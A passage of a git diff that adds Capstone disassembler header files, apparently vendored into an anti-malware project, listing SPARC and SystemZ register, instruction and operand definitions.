SPARC_REG_F5, + SPARC_REG_F6, + SPARC_REG_F7, + SPARC_REG_F8, + SPARC_REG_F9, + SPARC_REG_F10, + SPARC_REG_F11, + SPARC_REG_F12, + SPARC_REG_F13, + SPARC_REG_F14, + SPARC_REG_F15, + SPARC_REG_F16, + SPARC_REG_F17, + SPARC_REG_F18, + SPARC_REG_F19, + SPARC_REG_F20, + SPARC_REG_F21, + SPARC_REG_F22, + SPARC_REG_F23, + SPARC_REG_F24, + SPARC_REG_F25, + SPARC_REG_F26, + SPARC_REG_F27, + SPARC_REG_F28, + SPARC_REG_F29, + SPARC_REG_F30, + SPARC_REG_F31, + SPARC_REG_F32, + SPARC_REG_F34, + SPARC_REG_F36, + SPARC_REG_F38, + SPARC_REG_F40, + SPARC_REG_F42, + SPARC_REG_F44, + SPARC_REG_F46, + SPARC_REG_F48, + SPARC_REG_F50, + SPARC_REG_F52, + SPARC_REG_F54, + SPARC_REG_F56, + SPARC_REG_F58, + SPARC_REG_F60, + SPARC_REG_F62, + SPARC_REG_FCC0, // Floating condition codes + SPARC_REG_FCC1, + SPARC_REG_FCC2, + SPARC_REG_FCC3, + SPARC_REG_FP, + SPARC_REG_G0, + SPARC_REG_G1, + SPARC_REG_G2, + SPARC_REG_G3, + SPARC_REG_G4, + SPARC_REG_G5, + SPARC_REG_G6, + SPARC_REG_G7, + SPARC_REG_I0, + 
SPARC_REG_I1, + SPARC_REG_I2, + SPARC_REG_I3, + SPARC_REG_I4, + SPARC_REG_I5, + SPARC_REG_I7, + SPARC_REG_ICC, // Integer condition codes + SPARC_REG_L0, + SPARC_REG_L1, + SPARC_REG_L2, + SPARC_REG_L3, + SPARC_REG_L4, + SPARC_REG_L5, + SPARC_REG_L6, + SPARC_REG_L7, + SPARC_REG_O0, + SPARC_REG_O1, + SPARC_REG_O2, + SPARC_REG_O3, + SPARC_REG_O4, + SPARC_REG_O5, + SPARC_REG_O7, + SPARC_REG_SP, + SPARC_REG_Y, + + // special register + SPARC_REG_XCC, + + SPARC_REG_ENDING, // <-- mark the end of the list of registers + + // extras + SPARC_REG_O6 = SPARC_REG_SP, + SPARC_REG_I6 = SPARC_REG_FP, +} sparc_reg; + +/// Instruction's operand referring to memory +/// This is associated with SPARC_OP_MEM operand type above +typedef struct sparc_op_mem { + uint8_t base; ///< base register, can be safely interpreted as + ///< a value of type `sparc_reg`, but it is only + ///< one byte wide + uint8_t index; ///< index register, same conditions apply here + int32_t disp; ///< displacement/offset value +} sparc_op_mem; + +/// Instruction operand +typedef struct cs_sparc_op { + sparc_op_type type; ///< operand type + union { + sparc_reg reg; ///< register value for REG operand + int64_t imm; ///< immediate value for IMM operand + sparc_op_mem mem; ///< base/disp value for MEM operand + }; +} cs_sparc_op; + +/// Instruction structure +typedef struct cs_sparc { + sparc_cc cc; ///< code condition for this insn + sparc_hint hint; ///< branch hint: encoding as bitwise OR of sparc_hint. + /// Number of operands of this instruction, + /// or 0 when instruction has no operand. + uint8_t op_count; + cs_sparc_op operands[4]; ///< operands for this instruction. 
+} cs_sparc; + +/// SPARC instruction +typedef enum sparc_insn { + SPARC_INS_INVALID = 0, + + SPARC_INS_ADDCC, + SPARC_INS_ADDX, + SPARC_INS_ADDXCC, + SPARC_INS_ADDXC, + SPARC_INS_ADDXCCC, + SPARC_INS_ADD, + SPARC_INS_ALIGNADDR, + SPARC_INS_ALIGNADDRL, + SPARC_INS_ANDCC, + SPARC_INS_ANDNCC, + SPARC_INS_ANDN, + SPARC_INS_AND, + SPARC_INS_ARRAY16, + SPARC_INS_ARRAY32, + SPARC_INS_ARRAY8, + SPARC_INS_B, + SPARC_INS_JMP, + SPARC_INS_BMASK, + SPARC_INS_FB, + SPARC_INS_BRGEZ, + SPARC_INS_BRGZ, + SPARC_INS_BRLEZ, + SPARC_INS_BRLZ, + SPARC_INS_BRNZ, + SPARC_INS_BRZ, + SPARC_INS_BSHUFFLE, + SPARC_INS_CALL, + SPARC_INS_CASX, + SPARC_INS_CAS, + SPARC_INS_CMASK16, + SPARC_INS_CMASK32, + SPARC_INS_CMASK8, + SPARC_INS_CMP, + SPARC_INS_EDGE16, + SPARC_INS_EDGE16L, + SPARC_INS_EDGE16LN, + SPARC_INS_EDGE16N, + SPARC_INS_EDGE32, + SPARC_INS_EDGE32L, + SPARC_INS_EDGE32LN, + SPARC_INS_EDGE32N, + SPARC_INS_EDGE8, + SPARC_INS_EDGE8L, + SPARC_INS_EDGE8LN, + SPARC_INS_EDGE8N, + SPARC_INS_FABSD, + SPARC_INS_FABSQ, + SPARC_INS_FABSS, + SPARC_INS_FADDD, + SPARC_INS_FADDQ, + SPARC_INS_FADDS, + SPARC_INS_FALIGNDATA, + SPARC_INS_FAND, + SPARC_INS_FANDNOT1, + SPARC_INS_FANDNOT1S, + SPARC_INS_FANDNOT2, + SPARC_INS_FANDNOT2S, + SPARC_INS_FANDS, + SPARC_INS_FCHKSM16, + SPARC_INS_FCMPD, + SPARC_INS_FCMPEQ16, + SPARC_INS_FCMPEQ32, + SPARC_INS_FCMPGT16, + SPARC_INS_FCMPGT32, + SPARC_INS_FCMPLE16, + SPARC_INS_FCMPLE32, + SPARC_INS_FCMPNE16, + SPARC_INS_FCMPNE32, + SPARC_INS_FCMPQ, + SPARC_INS_FCMPS, + SPARC_INS_FDIVD, + SPARC_INS_FDIVQ, + SPARC_INS_FDIVS, + SPARC_INS_FDMULQ, + SPARC_INS_FDTOI, + SPARC_INS_FDTOQ, + SPARC_INS_FDTOS, + SPARC_INS_FDTOX, + SPARC_INS_FEXPAND, + SPARC_INS_FHADDD, + SPARC_INS_FHADDS, + SPARC_INS_FHSUBD, + SPARC_INS_FHSUBS, + SPARC_INS_FITOD, + SPARC_INS_FITOQ, + SPARC_INS_FITOS, + SPARC_INS_FLCMPD, + SPARC_INS_FLCMPS, + SPARC_INS_FLUSHW, + SPARC_INS_FMEAN16, + SPARC_INS_FMOVD, + SPARC_INS_FMOVQ, + SPARC_INS_FMOVRDGEZ, + SPARC_INS_FMOVRQGEZ, + SPARC_INS_FMOVRSGEZ, + 
SPARC_INS_FMOVRDGZ, + SPARC_INS_FMOVRQGZ, + SPARC_INS_FMOVRSGZ, + SPARC_INS_FMOVRDLEZ, + SPARC_INS_FMOVRQLEZ, + SPARC_INS_FMOVRSLEZ, + SPARC_INS_FMOVRDLZ, + SPARC_INS_FMOVRQLZ, + SPARC_INS_FMOVRSLZ, + SPARC_INS_FMOVRDNZ, + SPARC_INS_FMOVRQNZ, + SPARC_INS_FMOVRSNZ, + SPARC_INS_FMOVRDZ, + SPARC_INS_FMOVRQZ, + SPARC_INS_FMOVRSZ, + SPARC_INS_FMOVS, + SPARC_INS_FMUL8SUX16, + SPARC_INS_FMUL8ULX16, + SPARC_INS_FMUL8X16, + SPARC_INS_FMUL8X16AL, + SPARC_INS_FMUL8X16AU, + SPARC_INS_FMULD, + SPARC_INS_FMULD8SUX16, + SPARC_INS_FMULD8ULX16, + SPARC_INS_FMULQ, + SPARC_INS_FMULS, + SPARC_INS_FNADDD, + SPARC_INS_FNADDS, + SPARC_INS_FNAND, + SPARC_INS_FNANDS, + SPARC_INS_FNEGD, + SPARC_INS_FNEGQ, + SPARC_INS_FNEGS, + SPARC_INS_FNHADDD, + SPARC_INS_FNHADDS, + SPARC_INS_FNOR, + SPARC_INS_FNORS, + SPARC_INS_FNOT1, + SPARC_INS_FNOT1S, + SPARC_INS_FNOT2, + SPARC_INS_FNOT2S, + SPARC_INS_FONE, + SPARC_INS_FONES, + SPARC_INS_FOR, + SPARC_INS_FORNOT1, + SPARC_INS_FORNOT1S, + SPARC_INS_FORNOT2, + SPARC_INS_FORNOT2S, + SPARC_INS_FORS, + SPARC_INS_FPACK16, + SPARC_INS_FPACK32, + SPARC_INS_FPACKFIX, + SPARC_INS_FPADD16, + SPARC_INS_FPADD16S, + SPARC_INS_FPADD32, + SPARC_INS_FPADD32S, + SPARC_INS_FPADD64, + SPARC_INS_FPMERGE, + SPARC_INS_FPSUB16, + SPARC_INS_FPSUB16S, + SPARC_INS_FPSUB32, + SPARC_INS_FPSUB32S, + SPARC_INS_FQTOD, + SPARC_INS_FQTOI, + SPARC_INS_FQTOS, + SPARC_INS_FQTOX, + SPARC_INS_FSLAS16, + SPARC_INS_FSLAS32, + SPARC_INS_FSLL16, + SPARC_INS_FSLL32, + SPARC_INS_FSMULD, + SPARC_INS_FSQRTD, + SPARC_INS_FSQRTQ, + SPARC_INS_FSQRTS, + SPARC_INS_FSRA16, + SPARC_INS_FSRA32, + SPARC_INS_FSRC1, + SPARC_INS_FSRC1S, + SPARC_INS_FSRC2, + SPARC_INS_FSRC2S, + SPARC_INS_FSRL16, + SPARC_INS_FSRL32, + SPARC_INS_FSTOD, + SPARC_INS_FSTOI, + SPARC_INS_FSTOQ, + SPARC_INS_FSTOX, + SPARC_INS_FSUBD, + SPARC_INS_FSUBQ, + SPARC_INS_FSUBS, + SPARC_INS_FXNOR, + SPARC_INS_FXNORS, + SPARC_INS_FXOR, + SPARC_INS_FXORS, + SPARC_INS_FXTOD, + SPARC_INS_FXTOQ, + SPARC_INS_FXTOS, + SPARC_INS_FZERO, + 
SPARC_INS_FZEROS, + SPARC_INS_JMPL, + SPARC_INS_LDD, + SPARC_INS_LD, + SPARC_INS_LDQ, + SPARC_INS_LDSB, + SPARC_INS_LDSH, + SPARC_INS_LDSW, + SPARC_INS_LDUB, + SPARC_INS_LDUH, + SPARC_INS_LDX, + SPARC_INS_LZCNT, + SPARC_INS_MEMBAR, + SPARC_INS_MOVDTOX, + SPARC_INS_MOV, + SPARC_INS_MOVRGEZ, + SPARC_INS_MOVRGZ, + SPARC_INS_MOVRLEZ, + SPARC_INS_MOVRLZ, + SPARC_INS_MOVRNZ, + SPARC_INS_MOVRZ, + SPARC_INS_MOVSTOSW, + SPARC_INS_MOVSTOUW, + SPARC_INS_MULX, + SPARC_INS_NOP, + SPARC_INS_ORCC, + SPARC_INS_ORNCC, + SPARC_INS_ORN, + SPARC_INS_OR, + SPARC_INS_PDIST, + SPARC_INS_PDISTN, + SPARC_INS_POPC, + SPARC_INS_RD, + SPARC_INS_RESTORE, + SPARC_INS_RETT, + SPARC_INS_SAVE, + SPARC_INS_SDIVCC, + SPARC_INS_SDIVX, + SPARC_INS_SDIV, + SPARC_INS_SETHI, + SPARC_INS_SHUTDOWN, + SPARC_INS_SIAM, + SPARC_INS_SLLX, + SPARC_INS_SLL, + SPARC_INS_SMULCC, + SPARC_INS_SMUL, + SPARC_INS_SRAX, + SPARC_INS_SRA, + SPARC_INS_SRLX, + SPARC_INS_SRL, + SPARC_INS_STBAR, + SPARC_INS_STB, + SPARC_INS_STD, + SPARC_INS_ST, + SPARC_INS_STH, + SPARC_INS_STQ, + SPARC_INS_STX, + SPARC_INS_SUBCC, + SPARC_INS_SUBX, + SPARC_INS_SUBXCC, + SPARC_INS_SUB, + SPARC_INS_SWAP, + SPARC_INS_TADDCCTV, + SPARC_INS_TADDCC, + SPARC_INS_T, + SPARC_INS_TSUBCCTV, + SPARC_INS_TSUBCC, + SPARC_INS_UDIVCC, + SPARC_INS_UDIVX, + SPARC_INS_UDIV, + SPARC_INS_UMULCC, + SPARC_INS_UMULXHI, + SPARC_INS_UMUL, + SPARC_INS_UNIMP, + SPARC_INS_FCMPED, + SPARC_INS_FCMPEQ, + SPARC_INS_FCMPES, + SPARC_INS_WR, + SPARC_INS_XMULX, + SPARC_INS_XMULXHI, + SPARC_INS_XNORCC, + SPARC_INS_XNOR, + SPARC_INS_XORCC, + SPARC_INS_XOR, + + // alias instructions + SPARC_INS_RET, + SPARC_INS_RETL, + + SPARC_INS_ENDING, // <-- mark the end of the list of instructions +} sparc_insn; + +/// Group of SPARC instructions +typedef enum sparc_insn_group { + SPARC_GRP_INVALID = 0, ///< = CS_GRP_INVALID + + // Generic groups + // all jump instructions (conditional+direct+indirect jumps) + SPARC_GRP_JUMP, ///< = CS_GRP_JUMP + + // Architecture-specific groups + 
SPARC_GRP_HARDQUAD = 128, + SPARC_GRP_V9, + SPARC_GRP_VIS, + SPARC_GRP_VIS2, + SPARC_GRP_VIS3, + SPARC_GRP_32BIT, + SPARC_GRP_64BIT, + + SPARC_GRP_ENDING, // <-- mark the end of the list of groups +} sparc_insn_group; + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/capstone/include/capstone/systemz.h b/ai_anti_malware/capstone/include/capstone/systemz.h new file mode 100644 index 0000000..aa9768c --- /dev/null +++ b/ai_anti_malware/capstone/include/capstone/systemz.h @@ -0,0 +1,830 @@ +#ifndef CAPSTONE_SYSTEMZ_H +#define CAPSTONE_SYSTEMZ_H + +/* Capstone Disassembly Engine */ +/* By Nguyen Anh Quynh , 2014-2015 */ + +#ifdef __cplusplus +extern "C" { +#endif + +#include "platform.h" + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#endif + +/// Enums corresponding to SystemZ condition codes +typedef enum sysz_cc { + SYSZ_CC_INVALID = 0, ///< invalid CC (default) + + SYSZ_CC_O, + SYSZ_CC_H, + SYSZ_CC_NLE, + SYSZ_CC_L, + SYSZ_CC_NHE, + SYSZ_CC_LH, + SYSZ_CC_NE, + SYSZ_CC_E, + SYSZ_CC_NLH, + SYSZ_CC_HE, + SYSZ_CC_NL, + SYSZ_CC_LE, + SYSZ_CC_NH, + SYSZ_CC_NO, +} sysz_cc; + +/// Operand type for instruction's operands +typedef enum sysz_op_type { + SYSZ_OP_INVALID = 0, ///< = CS_OP_INVALID (Uninitialized). + SYSZ_OP_REG, ///< = CS_OP_REG (Register operand). + SYSZ_OP_IMM, ///< = CS_OP_IMM (Immediate operand). + SYSZ_OP_MEM, ///< = CS_OP_MEM (Memory operand). + SYSZ_OP_ACREG = 64, ///< Access register operand. 
+} sysz_op_type; + +/// SystemZ registers +typedef enum sysz_reg { + SYSZ_REG_INVALID = 0, + + SYSZ_REG_0, + SYSZ_REG_1, + SYSZ_REG_2, + SYSZ_REG_3, + SYSZ_REG_4, + SYSZ_REG_5, + SYSZ_REG_6, + SYSZ_REG_7, + SYSZ_REG_8, + SYSZ_REG_9, + SYSZ_REG_10, + SYSZ_REG_11, + SYSZ_REG_12, + SYSZ_REG_13, + SYSZ_REG_14, + SYSZ_REG_15, + SYSZ_REG_CC, + SYSZ_REG_F0, + SYSZ_REG_F1, + SYSZ_REG_F2, + SYSZ_REG_F3, + SYSZ_REG_F4, + SYSZ_REG_F5, + SYSZ_REG_F6, + SYSZ_REG_F7, + SYSZ_REG_F8, + SYSZ_REG_F9, + SYSZ_REG_F10, + SYSZ_REG_F11, + SYSZ_REG_F12, + SYSZ_REG_F13, + SYSZ_REG_F14, + SYSZ_REG_F15, + + SYSZ_REG_R0L, + + SYSZ_REG_ENDING, +} sysz_reg; + +/// Instruction's operand referring to memory +/// This is associated with SYSZ_OP_MEM operand type above +typedef struct sysz_op_mem { + uint8_t base; ///< base register, can be safely interpreted as + ///< a value of type `sysz_reg`, but it is only + ///< one byte wide + uint8_t index; ///< index register, same conditions apply here + uint64_t length; ///< BDLAddr operand + int64_t disp; ///< displacement/offset value +} sysz_op_mem; + +/// Instruction operand +typedef struct cs_sysz_op { + sysz_op_type type; ///< operand type + union { + sysz_reg reg; ///< register value for REG operand + int64_t imm; ///< immediate value for IMM operand + sysz_op_mem mem; ///< base/disp value for MEM operand + }; +} cs_sysz_op; + +// Instruction structure +typedef struct cs_sysz { + sysz_cc cc; ///< Code condition + /// Number of operands of this instruction, + /// or 0 when instruction has no operand. + uint8_t op_count; + cs_sysz_op operands[6]; ///< operands for this instruction. 
+} cs_sysz; + +/// SystemZ instruction +typedef enum sysz_insn { + SYSZ_INS_INVALID = 0, + + SYSZ_INS_A, + SYSZ_INS_ADB, + SYSZ_INS_ADBR, + SYSZ_INS_AEB, + SYSZ_INS_AEBR, + SYSZ_INS_AFI, + SYSZ_INS_AG, + SYSZ_INS_AGF, + SYSZ_INS_AGFI, + SYSZ_INS_AGFR, + SYSZ_INS_AGHI, + SYSZ_INS_AGHIK, + SYSZ_INS_AGR, + SYSZ_INS_AGRK, + SYSZ_INS_AGSI, + SYSZ_INS_AH, + SYSZ_INS_AHI, + SYSZ_INS_AHIK, + SYSZ_INS_AHY, + SYSZ_INS_AIH, + SYSZ_INS_AL, + SYSZ_INS_ALC, + SYSZ_INS_ALCG, + SYSZ_INS_ALCGR, + SYSZ_INS_ALCR, + SYSZ_INS_ALFI, + SYSZ_INS_ALG, + SYSZ_INS_ALGF, + SYSZ_INS_ALGFI, + SYSZ_INS_ALGFR, + SYSZ_INS_ALGHSIK, + SYSZ_INS_ALGR, + SYSZ_INS_ALGRK, + SYSZ_INS_ALHSIK, + SYSZ_INS_ALR, + SYSZ_INS_ALRK, + SYSZ_INS_ALY, + SYSZ_INS_AR, + SYSZ_INS_ARK, + SYSZ_INS_ASI, + SYSZ_INS_AXBR, + SYSZ_INS_AY, + SYSZ_INS_BCR, + SYSZ_INS_BRC, + SYSZ_INS_BRCL, + SYSZ_INS_CGIJ, + SYSZ_INS_CGRJ, + SYSZ_INS_CIJ, + SYSZ_INS_CLGIJ, + SYSZ_INS_CLGRJ, + SYSZ_INS_CLIJ, + SYSZ_INS_CLRJ, + SYSZ_INS_CRJ, + SYSZ_INS_BER, + SYSZ_INS_JE, + SYSZ_INS_JGE, + SYSZ_INS_LOCE, + SYSZ_INS_LOCGE, + SYSZ_INS_LOCGRE, + SYSZ_INS_LOCRE, + SYSZ_INS_STOCE, + SYSZ_INS_STOCGE, + SYSZ_INS_BHR, + SYSZ_INS_BHER, + SYSZ_INS_JHE, + SYSZ_INS_JGHE, + SYSZ_INS_LOCHE, + SYSZ_INS_LOCGHE, + SYSZ_INS_LOCGRHE, + SYSZ_INS_LOCRHE, + SYSZ_INS_STOCHE, + SYSZ_INS_STOCGHE, + SYSZ_INS_JH, + SYSZ_INS_JGH, + SYSZ_INS_LOCH, + SYSZ_INS_LOCGH, + SYSZ_INS_LOCGRH, + SYSZ_INS_LOCRH, + SYSZ_INS_STOCH, + SYSZ_INS_STOCGH, + SYSZ_INS_CGIJNLH, + SYSZ_INS_CGRJNLH, + SYSZ_INS_CIJNLH, + SYSZ_INS_CLGIJNLH, + SYSZ_INS_CLGRJNLH, + SYSZ_INS_CLIJNLH, + SYSZ_INS_CLRJNLH, + SYSZ_INS_CRJNLH, + SYSZ_INS_CGIJE, + SYSZ_INS_CGRJE, + SYSZ_INS_CIJE, + SYSZ_INS_CLGIJE, + SYSZ_INS_CLGRJE, + SYSZ_INS_CLIJE, + SYSZ_INS_CLRJE, + SYSZ_INS_CRJE, + SYSZ_INS_CGIJNLE, + SYSZ_INS_CGRJNLE, + SYSZ_INS_CIJNLE, + SYSZ_INS_CLGIJNLE, + SYSZ_INS_CLGRJNLE, + SYSZ_INS_CLIJNLE, + SYSZ_INS_CLRJNLE, + SYSZ_INS_CRJNLE, + SYSZ_INS_CGIJH, + SYSZ_INS_CGRJH, + SYSZ_INS_CIJH, + SYSZ_INS_CLGIJH, + 
SYSZ_INS_CLGRJH, + SYSZ_INS_CLIJH, + SYSZ_INS_CLRJH, + SYSZ_INS_CRJH, + SYSZ_INS_CGIJNL, + SYSZ_INS_CGRJNL, + SYSZ_INS_CIJNL, + SYSZ_INS_CLGIJNL, + SYSZ_INS_CLGRJNL, + SYSZ_INS_CLIJNL, + SYSZ_INS_CLRJNL, + SYSZ_INS_CRJNL, + SYSZ_INS_CGIJHE, + SYSZ_INS_CGRJHE, + SYSZ_INS_CIJHE, + SYSZ_INS_CLGIJHE, + SYSZ_INS_CLGRJHE, + SYSZ_INS_CLIJHE, + SYSZ_INS_CLRJHE, + SYSZ_INS_CRJHE, + SYSZ_INS_CGIJNHE, + SYSZ_INS_CGRJNHE, + SYSZ_INS_CIJNHE, + SYSZ_INS_CLGIJNHE, + SYSZ_INS_CLGRJNHE, + SYSZ_INS_CLIJNHE, + SYSZ_INS_CLRJNHE, + SYSZ_INS_CRJNHE, + SYSZ_INS_CGIJL, + SYSZ_INS_CGRJL, + SYSZ_INS_CIJL, + SYSZ_INS_CLGIJL, + SYSZ_INS_CLGRJL, + SYSZ_INS_CLIJL, + SYSZ_INS_CLRJL, + SYSZ_INS_CRJL, + SYSZ_INS_CGIJNH, + SYSZ_INS_CGRJNH, + SYSZ_INS_CIJNH, + SYSZ_INS_CLGIJNH, + SYSZ_INS_CLGRJNH, + SYSZ_INS_CLIJNH, + SYSZ_INS_CLRJNH, + SYSZ_INS_CRJNH, + SYSZ_INS_CGIJLE, + SYSZ_INS_CGRJLE, + SYSZ_INS_CIJLE, + SYSZ_INS_CLGIJLE, + SYSZ_INS_CLGRJLE, + SYSZ_INS_CLIJLE, + SYSZ_INS_CLRJLE, + SYSZ_INS_CRJLE, + SYSZ_INS_CGIJNE, + SYSZ_INS_CGRJNE, + SYSZ_INS_CIJNE, + SYSZ_INS_CLGIJNE, + SYSZ_INS_CLGRJNE, + SYSZ_INS_CLIJNE, + SYSZ_INS_CLRJNE, + SYSZ_INS_CRJNE, + SYSZ_INS_CGIJLH, + SYSZ_INS_CGRJLH, + SYSZ_INS_CIJLH, + SYSZ_INS_CLGIJLH, + SYSZ_INS_CLGRJLH, + SYSZ_INS_CLIJLH, + SYSZ_INS_CLRJLH, + SYSZ_INS_CRJLH, + SYSZ_INS_BLR, + SYSZ_INS_BLER, + SYSZ_INS_JLE, + SYSZ_INS_JGLE, + SYSZ_INS_LOCLE, + SYSZ_INS_LOCGLE, + SYSZ_INS_LOCGRLE, + SYSZ_INS_LOCRLE, + SYSZ_INS_STOCLE, + SYSZ_INS_STOCGLE, + SYSZ_INS_BLHR, + SYSZ_INS_JLH, + SYSZ_INS_JGLH, + SYSZ_INS_LOCLH, + SYSZ_INS_LOCGLH, + SYSZ_INS_LOCGRLH, + SYSZ_INS_LOCRLH, + SYSZ_INS_STOCLH, + SYSZ_INS_STOCGLH, + SYSZ_INS_JL, + SYSZ_INS_JGL, + SYSZ_INS_LOCL, + SYSZ_INS_LOCGL, + SYSZ_INS_LOCGRL, + SYSZ_INS_LOCRL, + SYSZ_INS_LOC, + SYSZ_INS_LOCG, + SYSZ_INS_LOCGR, + SYSZ_INS_LOCR, + SYSZ_INS_STOCL, + SYSZ_INS_STOCGL, + SYSZ_INS_BNER, + SYSZ_INS_JNE, + SYSZ_INS_JGNE, + SYSZ_INS_LOCNE, + SYSZ_INS_LOCGNE, + SYSZ_INS_LOCGRNE, + SYSZ_INS_LOCRNE, + SYSZ_INS_STOCNE, + 
SYSZ_INS_STOCGNE, + SYSZ_INS_BNHR, + SYSZ_INS_BNHER, + SYSZ_INS_JNHE, + SYSZ_INS_JGNHE, + SYSZ_INS_LOCNHE, + SYSZ_INS_LOCGNHE, + SYSZ_INS_LOCGRNHE, + SYSZ_INS_LOCRNHE, + SYSZ_INS_STOCNHE, + SYSZ_INS_STOCGNHE, + SYSZ_INS_JNH, + SYSZ_INS_JGNH, + SYSZ_INS_LOCNH, + SYSZ_INS_LOCGNH, + SYSZ_INS_LOCGRNH, + SYSZ_INS_LOCRNH, + SYSZ_INS_STOCNH, + SYSZ_INS_STOCGNH, + SYSZ_INS_BNLR, + SYSZ_INS_BNLER, + SYSZ_INS_JNLE, + SYSZ_INS_JGNLE, + SYSZ_INS_LOCNLE, + SYSZ_INS_LOCGNLE, + SYSZ_INS_LOCGRNLE, + SYSZ_INS_LOCRNLE, + SYSZ_INS_STOCNLE, + SYSZ_INS_STOCGNLE, + SYSZ_INS_BNLHR, + SYSZ_INS_JNLH, + SYSZ_INS_JGNLH, + SYSZ_INS_LOCNLH, + SYSZ_INS_LOCGNLH, + SYSZ_INS_LOCGRNLH, + SYSZ_INS_LOCRNLH, + SYSZ_INS_STOCNLH, + SYSZ_INS_STOCGNLH, + SYSZ_INS_JNL, + SYSZ_INS_JGNL, + SYSZ_INS_LOCNL, + SYSZ_INS_LOCGNL, + SYSZ_INS_LOCGRNL, + SYSZ_INS_LOCRNL, + SYSZ_INS_STOCNL, + SYSZ_INS_STOCGNL, + SYSZ_INS_BNOR, + SYSZ_INS_JNO, + SYSZ_INS_JGNO, + SYSZ_INS_LOCNO, + SYSZ_INS_LOCGNO, + SYSZ_INS_LOCGRNO, + SYSZ_INS_LOCRNO, + SYSZ_INS_STOCNO, + SYSZ_INS_STOCGNO, + SYSZ_INS_BOR, + SYSZ_INS_JO, + SYSZ_INS_JGO, + SYSZ_INS_LOCO, + SYSZ_INS_LOCGO, + SYSZ_INS_LOCGRO, + SYSZ_INS_LOCRO, + SYSZ_INS_STOCO, + SYSZ_INS_STOCGO, + SYSZ_INS_STOC, + SYSZ_INS_STOCG, + SYSZ_INS_BASR, + SYSZ_INS_BR, + SYSZ_INS_BRAS, + SYSZ_INS_BRASL, + SYSZ_INS_J, + SYSZ_INS_JG, + SYSZ_INS_BRCT, + SYSZ_INS_BRCTG, + SYSZ_INS_C, + SYSZ_INS_CDB, + SYSZ_INS_CDBR, + SYSZ_INS_CDFBR, + SYSZ_INS_CDGBR, + SYSZ_INS_CDLFBR, + SYSZ_INS_CDLGBR, + SYSZ_INS_CEB, + SYSZ_INS_CEBR, + SYSZ_INS_CEFBR, + SYSZ_INS_CEGBR, + SYSZ_INS_CELFBR, + SYSZ_INS_CELGBR, + SYSZ_INS_CFDBR, + SYSZ_INS_CFEBR, + SYSZ_INS_CFI, + SYSZ_INS_CFXBR, + SYSZ_INS_CG, + SYSZ_INS_CGDBR, + SYSZ_INS_CGEBR, + SYSZ_INS_CGF, + SYSZ_INS_CGFI, + SYSZ_INS_CGFR, + SYSZ_INS_CGFRL, + SYSZ_INS_CGH, + SYSZ_INS_CGHI, + SYSZ_INS_CGHRL, + SYSZ_INS_CGHSI, + SYSZ_INS_CGR, + SYSZ_INS_CGRL, + SYSZ_INS_CGXBR, + SYSZ_INS_CH, + SYSZ_INS_CHF, + SYSZ_INS_CHHSI, + SYSZ_INS_CHI, + SYSZ_INS_CHRL, + SYSZ_INS_CHSI, + 
SYSZ_INS_CHY, + SYSZ_INS_CIH, + SYSZ_INS_CL, + SYSZ_INS_CLC, + SYSZ_INS_CLFDBR, + SYSZ_INS_CLFEBR, + SYSZ_INS_CLFHSI, + SYSZ_INS_CLFI, + SYSZ_INS_CLFXBR, + SYSZ_INS_CLG, + SYSZ_INS_CLGDBR, + SYSZ_INS_CLGEBR, + SYSZ_INS_CLGF, + SYSZ_INS_CLGFI, + SYSZ_INS_CLGFR, + SYSZ_INS_CLGFRL, + SYSZ_INS_CLGHRL, + SYSZ_INS_CLGHSI, + SYSZ_INS_CLGR, + SYSZ_INS_CLGRL, + SYSZ_INS_CLGXBR, + SYSZ_INS_CLHF, + SYSZ_INS_CLHHSI, + SYSZ_INS_CLHRL, + SYSZ_INS_CLI, + SYSZ_INS_CLIH, + SYSZ_INS_CLIY, + SYSZ_INS_CLR, + SYSZ_INS_CLRL, + SYSZ_INS_CLST, + SYSZ_INS_CLY, + SYSZ_INS_CPSDR, + SYSZ_INS_CR, + SYSZ_INS_CRL, + SYSZ_INS_CS, + SYSZ_INS_CSG, + SYSZ_INS_CSY, + SYSZ_INS_CXBR, + SYSZ_INS_CXFBR, + SYSZ_INS_CXGBR, + SYSZ_INS_CXLFBR, + SYSZ_INS_CXLGBR, + SYSZ_INS_CY, + SYSZ_INS_DDB, + SYSZ_INS_DDBR, + SYSZ_INS_DEB, + SYSZ_INS_DEBR, + SYSZ_INS_DL, + SYSZ_INS_DLG, + SYSZ_INS_DLGR, + SYSZ_INS_DLR, + SYSZ_INS_DSG, + SYSZ_INS_DSGF, + SYSZ_INS_DSGFR, + SYSZ_INS_DSGR, + SYSZ_INS_DXBR, + SYSZ_INS_EAR, + SYSZ_INS_FIDBR, + SYSZ_INS_FIDBRA, + SYSZ_INS_FIEBR, + SYSZ_INS_FIEBRA, + SYSZ_INS_FIXBR, + SYSZ_INS_FIXBRA, + SYSZ_INS_FLOGR, + SYSZ_INS_IC, + SYSZ_INS_ICY, + SYSZ_INS_IIHF, + SYSZ_INS_IIHH, + SYSZ_INS_IIHL, + SYSZ_INS_IILF, + SYSZ_INS_IILH, + SYSZ_INS_IILL, + SYSZ_INS_IPM, + SYSZ_INS_L, + SYSZ_INS_LA, + SYSZ_INS_LAA, + SYSZ_INS_LAAG, + SYSZ_INS_LAAL, + SYSZ_INS_LAALG, + SYSZ_INS_LAN, + SYSZ_INS_LANG, + SYSZ_INS_LAO, + SYSZ_INS_LAOG, + SYSZ_INS_LARL, + SYSZ_INS_LAX, + SYSZ_INS_LAXG, + SYSZ_INS_LAY, + SYSZ_INS_LB, + SYSZ_INS_LBH, + SYSZ_INS_LBR, + SYSZ_INS_LCDBR, + SYSZ_INS_LCEBR, + SYSZ_INS_LCGFR, + SYSZ_INS_LCGR, + SYSZ_INS_LCR, + SYSZ_INS_LCXBR, + SYSZ_INS_LD, + SYSZ_INS_LDEB, + SYSZ_INS_LDEBR, + SYSZ_INS_LDGR, + SYSZ_INS_LDR, + SYSZ_INS_LDXBR, + SYSZ_INS_LDXBRA, + SYSZ_INS_LDY, + SYSZ_INS_LE, + SYSZ_INS_LEDBR, + SYSZ_INS_LEDBRA, + SYSZ_INS_LER, + SYSZ_INS_LEXBR, + SYSZ_INS_LEXBRA, + SYSZ_INS_LEY, + SYSZ_INS_LFH, + SYSZ_INS_LG, + SYSZ_INS_LGB, + SYSZ_INS_LGBR, + SYSZ_INS_LGDR, + SYSZ_INS_LGF, + 
